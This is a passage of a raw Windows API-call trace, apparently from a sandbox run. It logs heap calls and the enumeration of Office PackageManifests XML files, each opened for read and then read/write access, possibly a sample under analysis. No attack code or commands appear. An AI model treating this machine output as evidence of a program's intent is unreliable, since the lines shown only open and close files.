| out: hHeap=0x20000) returned 1 [0099.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cc38 | out: hHeap=0x20000) returned 1 [0099.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0099.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0099.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0099.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0099.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88e18 [0099.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88b60 [0099.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88e18 | out: hHeap=0x20000) returned 1 [0099.136] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.136] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.136] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.136] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b60 | out: hHeap=0x20000) returned 1 [0099.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.136] AreFileApisANSI () returned 1 [0099.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0099.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.136] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.136] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.136] AreFileApisANSI () returned 1 [0099.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 105 [0099.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.137] GetFileType (hFile=0x368) returned 0x1 [0099.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.137] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.137] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.137] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.137] CloseHandle (hObject=0x368) returned 1 [0099.138] AreFileApisANSI () returned 1 [0099.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.138] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 105 [0099.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.138] GetFileType (hFile=0x368) returned 0x1 [0099.138] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.138] CloseHandle (hObject=0x368) returned 1 [0099.138] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.138] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.138] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.138] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.138] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.138] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.138] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.138] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0099.138] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.138] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0099.138] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0099.138] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0099.138] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0099.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0099.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0099.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.139] AreFileApisANSI () returned 1 [0099.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 105 [0099.139] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83ea71ba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x618a8)) returned 1 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.140] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.140] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.140] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x839bc0c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x839bc0c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP2C4B~1.XML")) returned 1 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d220 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88d30 [0099.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x892a0 [0099.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88d30 | out: hHeap=0x20000) returned 1 [0099.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x892a0 | out: hHeap=0x20000) returned 1 [0099.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.141] AreFileApisANSI () returned 1 [0099.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0099.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.141] AreFileApisANSI () returned 1 [0099.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 105 [0099.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.141] GetFileType (hFile=0x368) returned 0x1 [0099.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.142] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.142] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.142] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.142] CloseHandle (hObject=0x368) returned 1 [0099.142] AreFileApisANSI () returned 1 [0099.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 105 [0099.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.143] GetFileType (hFile=0x368) returned 0x1 [0099.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.143] CloseHandle (hObject=0x368) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0099.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0099.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0099.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0099.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.144] HeapFree (in: hHeap=0x20000, 